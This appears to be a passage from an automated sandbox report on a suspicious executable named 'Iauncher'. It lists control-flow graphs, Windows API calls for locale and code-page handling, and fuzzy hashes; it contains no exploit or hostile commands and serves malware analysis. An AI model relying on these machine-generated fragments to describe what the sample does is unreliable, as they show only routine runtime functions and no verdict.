                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2915228174-0
                                                                                                                                                                              • Opcode ID: 340efd9a013c8147b0c60a81b909035e3ccdaf4007fc3f19de978cb20119d33f
                                                                                                                                                                              • Instruction ID: a024e8ca57083b4414dfd9598f37033684e695e50a445cee3d2b4d06829ac719
                                                                                                                                                                              • Opcode Fuzzy Hash: 340efd9a013c8147b0c60a81b909035e3ccdaf4007fc3f19de978cb20119d33f
                                                                                                                                                                              • Instruction Fuzzy Hash: DE61C471D05269AFDF11CFA8EC44BEE7BB9AF09354F144049E800AB292D735D902EB61
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 172 f2a0ba-f2a0e2 call f29bea 175 f2a2aa-f2a2ab call f29c5b 172->175 176 f2a0e8-f2a0ee 172->176 179 f2a2b0-f2a2b2 175->179 178 f2a0f1-f2a0f7 176->178 180 f2a1f9-f2a218 call f18c70 178->180 181 f2a0fd-f2a109 178->181 182 f2a2b3-f2a2c1 call f162ac 179->182 189 f2a21b-f2a220 180->189 181->178 183 f2a10b-f2a111 181->183 186 f2a1f1-f2a1f4 183->186 187 f2a117-f2a123 IsValidCodePage 183->187 186->182 187->186 191 f2a129-f2a130 187->191 192 f2a222-f2a227 189->192 193 f2a25d-f2a267 189->193 194 f2a132-f2a13e 191->194 195 f2a158-f2a165 GetCPInfo 191->195 196 f2a25a 192->196 197 f2a229-f2a231 192->197 193->189 198 f2a269-f2a293 call f29bac 193->198 199 f2a142-f2a14e call f29cbe 194->199 200 f2a167-f2a186 call f18c70 195->200 201 f2a1e5-f2a1eb 195->201 196->193 202 f2a252-f2a258 197->202 203 f2a233-f2a236 197->203 213 f2a294-f2a2a3 198->213 209 f2a153 199->209 200->199 211 f2a188-f2a18f 200->211 201->175 201->186 202->192 202->196 207 f2a238-f2a23e 203->207 207->202 212 f2a240-f2a250 207->212 209->179 214 f2a191-f2a196 211->214 215 f2a1bb-f2a1be 211->215 212->202 212->207 213->213 216 f2a2a5 213->216 214->215 217 f2a198-f2a1a0 214->217 218 f2a1c3-f2a1ca 215->218 216->175 219 f2a1a2-f2a1a9 217->219 220 f2a1b3-f2a1b9 217->220 218->218 221 f2a1cc-f2a1e0 call f29bac 218->221 222 f2a1aa-f2a1b1 219->222 220->214 220->215 221->199 222->220 222->222
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F29BEA: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00F29C15
                                                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00F29F01,?,00000000,?,00000000,?), ref: 00F2A11B
                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F29F01,?,00000000,?,00000000,?), ref: 00F2A15D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                              • Opcode ID: fcfd8c518dda5d21cb54bfb55ca893fc29dbeea141ced1f8c6980e5f7e300d42
                                                                                                                                                                              • Instruction ID: 468968a5d5fb021c3b8533638116f793e5e9fa338e1840801f5f37b84eadd5ef
                                                                                                                                                                              • Opcode Fuzzy Hash: fcfd8c518dda5d21cb54bfb55ca893fc29dbeea141ced1f8c6980e5f7e300d42
                                                                                                                                                                              • Instruction Fuzzy Hash: 42513870E003658FDB20CF75E8906AAFBF5FF81320F14446ED0868B291E6759946EF52
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 225 f157bd-f157dd 226 f157e8-f157ef 225->226 227 f157df-f157e6 call f157a3 225->227 229 f15811-f15815 226->229 230 f157f1-f157fb 226->230 235 f1583d-f1584b call f162ac 227->235 232 f15817-f15826 call f15419 229->232 233 f1583a 229->233 230->229 231 f157fd-f1580f 230->231 231->235 239 f15828-f1582c call f14c2e 232->239 240 f1584e-f15883 232->240 233->235 243 f15831-f15835 239->243 247 f15885-f15888 240->247 248 f158a9-f158b1 240->248 243->233 245 f15837 243->245 245->233 247->248 249 f1588a-f1588e 247->249 250 f158b3-f158c4 call f1f796 248->250 251 f158ca-f158d4 248->251 249->233 252 f15890-f1589f call f14c2e 249->252 250->233 250->251 251->233 254 f158da-f158dd 251->254 252->233 258 f158a1-f158a7 252->258 254->235 258->233
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Fputc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3078413507-0
                                                                                                                                                                              • Opcode ID: e754118b4613316843f6d887664ffb30d66388ceb11ba0cc3c16179f8a3b26d8
                                                                                                                                                                              • Instruction ID: 84fe127aa253ce7e8d1fe65ff2e9b0310898099063ebd0a416712a80aaa066e8
                                                                                                                                                                              • Opcode Fuzzy Hash: e754118b4613316843f6d887664ffb30d66388ceb11ba0cc3c16179f8a3b26d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A418C36D01A1AEBCF15DF64C9809EDB7B8FF48734B184026E801A7640EB71ED81EB90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 259 f27d28-f27d7d call f17020 262 f27df2-f27e02 call f162ac 259->262 263 f27d7f 259->263 265 f27d85 263->265 267 f27d8b-f27d8d 265->267 268 f27da7-f27dcc WriteFile 267->268 269 f27d8f-f27d94 267->269 272 f27dea-f27df0 GetLastError 268->272 273 f27dce-f27dd9 268->273 270 f27d96-f27d9c 269->270 271 f27d9d-f27da5 269->271 270->271 271->267 271->268 272->262 273->262 274 f27ddb-f27de6 273->274 274->265 275 f27de8 274->275 275->262
                                                                                                                                                                              APIs
                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00F28275,00000000,00000000,00000000,?,0000000C,00000000), ref: 00F27DC4
                                                                                                                                                                              • GetLastError.KERNEL32(?,00F28275,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00F3D558,00000010,00F1F70D,00000000,00000000), ref: 00F27DEA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 442123175-0
                                                                                                                                                                              • Opcode ID: 43e24427a2a27d5d60f6156526d8eef935be3dee9b5d64fd8f3c9d7f811cde4f
                                                                                                                                                                              • Instruction ID: 0041e401648bfbe1ea4baadc730e537ccf024f7abcdfa4dbc63646cdaa3402bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 43e24427a2a27d5d60f6156526d8eef935be3dee9b5d64fd8f3c9d7f811cde4f
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E21B131A002299FCF19DF29EC80AEDB7BAFF48311F5440A9E906D7211D630AD42DF61
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 276 f256aa-f256af 277 f256b1-f256c9 276->277 278 f256d7-f256e0 277->278 279 f256cb-f256cf 277->279 281 f256f2 278->281 282 f256e2-f256e5 278->282 279->278 280 f256d1-f256d5 279->280 284 f2574c-f25750 280->284 283 f256f4-f25701 GetStdHandle 281->283 285 f256e7-f256ec 282->285 286 f256ee-f256f0 282->286 287 f25703-f25705 283->287 288 f2572e-f25740 283->288 284->277 289 f25756-f25759 284->289 285->283 286->283 287->288 290 f25707-f25710 GetFileType 287->290 288->284 291 f25742-f25745 288->291 290->288 292 f25712-f2571b 290->292 291->284 293 f25723-f25726 292->293 294 f2571d-f25721 292->294 293->284 295 f25728-f2572c 293->295 294->284 295->284
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00F256F6
                                                                                                                                                                              • GetFileType.KERNELBASE(00000000), ref: 00F25708
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                                              • Opcode ID: e072a07c387d0b07ce76e1aec9847544423027b7c2e6aed7d9a93342f52eb4ea
                                                                                                                                                                              • Instruction ID: 4328c88326ca3dee5b37947ef220e05dcb5260337179bc15a28e4414e21a9dd2
                                                                                                                                                                              • Opcode Fuzzy Hash: e072a07c387d0b07ce76e1aec9847544423027b7c2e6aed7d9a93342f52eb4ea
                                                                                                                                                                              • Instruction Fuzzy Hash: 4911B172A04F2586C7304A3EAC88626BE95AB56B30B38071AD5B6C75F1C630D886F651
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 296 f25e56-f25e65 call f25988 299 f25e67-f25e8c LCMapStringEx 296->299 300 f25e8e-f25ea8 call f25eb3 LCMapStringW 296->300 304 f25eae-f25eb0 299->304 300->304
                                                                                                                                                                              APIs
                                                                                                                                                                              • LCMapStringEx.KERNELBASE(?,00F26AA9,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00F25E8A
                                                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00F26AA9,?,?,00000000,?,00000000), ref: 00F25EA8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2568140703-0
                                                                                                                                                                              • Opcode ID: 61359a3cfb1e0683a2298bd73173cab565510cd3642a509743989d2928363090
                                                                                                                                                                              • Instruction ID: f12ccbd5928d5e4a74bf6290e0b93bf77dfb6a2863a3605c88466c624d71ed63
                                                                                                                                                                              • Opcode Fuzzy Hash: 61359a3cfb1e0683a2298bd73173cab565510cd3642a509743989d2928363090
                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF03A3250092EBBCF126F90ED05DDE7F66EF48761F064110FA1869120C736D972BB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 305 f29cbe-f29ce0 306 f29ce6-f29cf8 GetCPInfo 305->306 307 f29df9-f29e1f 305->307 306->307 309 f29cfe-f29d05 306->309 308 f29e24-f29e29 307->308 310 f29e33-f29e39 308->310 311 f29e2b-f29e31 308->311 312 f29d07-f29d11 309->312 314 f29e45 310->314 315 f29e3b-f29e3e 310->315 313 f29e41-f29e43 311->313 312->312 316 f29d13-f29d26 312->316 317 f29e47-f29e59 313->317 314->317 315->313 318 f29d47-f29d49 316->318 317->308 321 f29e5b-f29e69 call f162ac 317->321 319 f29d4b-f29d82 call f268b2 call f26ba9 318->319 320 f29d28-f29d2f 318->320 331 f29d87-f29dbc call f26ba9 319->331 324 f29d3e-f29d40 320->324 327 f29d42-f29d45 324->327 328 f29d31-f29d33 324->328 327->318 328->327 330 f29d35-f29d3d 328->330 330->324 334 f29dbe-f29dc8 331->334 335 f29dd6-f29dd8 334->335 336 f29dca-f29dd4 334->336 338 f29de6 335->338 339 f29dda-f29de4 335->339 337 f29de8-f29df5 336->337 337->334 340 f29df7 337->340 338->337 339->337 340->321
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCPInfo.KERNEL32(E8458D00,?,00F29F0D,00F29F01,00000000), ref: 00F29CF0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Info
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1807457897-0
                                                                                                                                                                              • Opcode ID: 97271037e3c6e5a77b8dd14daa8c86792e47aefed63a2d8f1c955ebada67a484
                                                                                                                                                                              • Instruction ID: 545a876e533af9ff4aae5431e067b60673fae9387687a910a875756d9ba504b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 97271037e3c6e5a77b8dd14daa8c86792e47aefed63a2d8f1c955ebada67a484
                                                                                                                                                                              • Instruction Fuzzy Hash: 42517B719081689BDB218A28ED80BE67BB8EB45314F6405EDE1DAC7042C3B49D45FF20
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 341 f25a87-f25aaf 342 f25ab1-f25ab3 341->342 343 f25ab5-f25ab7 341->343 344 f25b06-f25b09 342->344 345 f25ab9-f25abb 343->345 346 f25abd-f25ac4 call f259bc 343->346 345->344 348 f25ac9-f25acd 346->348 349 f25acf-f25add GetProcAddress 348->349 350 f25aec-f25b03 348->350 349->350 351 f25adf-f25aea call f20594 349->351 352 f25b05 350->352 351->352 352->344
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 05d4057b70623bbad8e173207617e385ca785c9045ef0efbb8dcaeda0732e4be
                                                                                                                                                                              • Instruction ID: 5ac38d97dedc9150bc94671f3639567d7629e9d4a14de4c1d2e08caf9793e622
                                                                                                                                                                              • Opcode Fuzzy Hash: 05d4057b70623bbad8e173207617e385ca785c9045ef0efbb8dcaeda0732e4be
                                                                                                                                                                              • Instruction Fuzzy Hash: 9401F533B006399B9B16DE29FD91A5B3397ABC4B303184120F900DB194EA34D805EE80
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00F2CC6F,00000002,00000000,?,?,?,00F2CC6F,?,00000000), ref: 00F2C9EA
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00F2CC6F,00000002,00000000,?,?,?,00F2CC6F,?,00000000), ref: 00F2CA13
                                                                                                                                                                              • GetACP.KERNEL32(?,?,00F2CC6F,?,00000000), ref: 00F2CA28
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                              • Opcode ID: f7a486a2a3a518ea03dd927430bc2e17e3c9a6a66afd8c84598dc51d143315b4
                                                                                                                                                                              • Instruction ID: 13b46624ac05ce6b957c40482fbde50a8a94347ac97e82a39cbfd424f66eec4a
                                                                                                                                                                              • Opcode Fuzzy Hash: f7a486a2a3a518ea03dd927430bc2e17e3c9a6a66afd8c84598dc51d143315b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 05219072A00129AAD724DB64E901BAF76A6AF54BB0B568524E90ADB101F732DD80F7D0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F2CC32
                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00F2CC7B
                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00F2CC8A
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F2CCD2
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F2CCF1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                              • Opcode ID: 4a394f95b4676f9c1d613424c1aabfe156ebb7fce670c24b62aa21e136f21bf9
                                                                                                                                                                              • Instruction ID: 33e73a3b5681c86c3cfcc0d4abfafc2e8c3c468c5710b4a133b42e9612b199fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 4a394f95b4676f9c1d613424c1aabfe156ebb7fce670c24b62aa21e136f21bf9
                                                                                                                                                                              • Instruction Fuzzy Hash: 5951A372E002299FDF20EFA5EC41BBE73B8AF04750F144469F904E7180DB74AA40ABA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,00F217C6,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F2C283
